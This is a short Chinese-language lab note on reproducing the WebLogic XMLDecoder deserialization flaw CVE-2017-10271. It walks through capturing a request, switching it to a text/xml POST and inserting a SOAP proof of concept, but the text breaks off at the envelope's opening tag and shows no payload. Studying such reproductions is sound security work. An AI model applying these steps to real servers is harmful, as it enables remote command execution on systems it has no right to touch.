weblogic反序列化漏洞CVE-2017-10271
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
复现步骤:
- 启动环境后打开目标地址:出现404可能存在反序列化漏洞
抓包发送给repeater,将GET改成POST,增加Content-Type: text/xml
3. 在body中插入POC
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">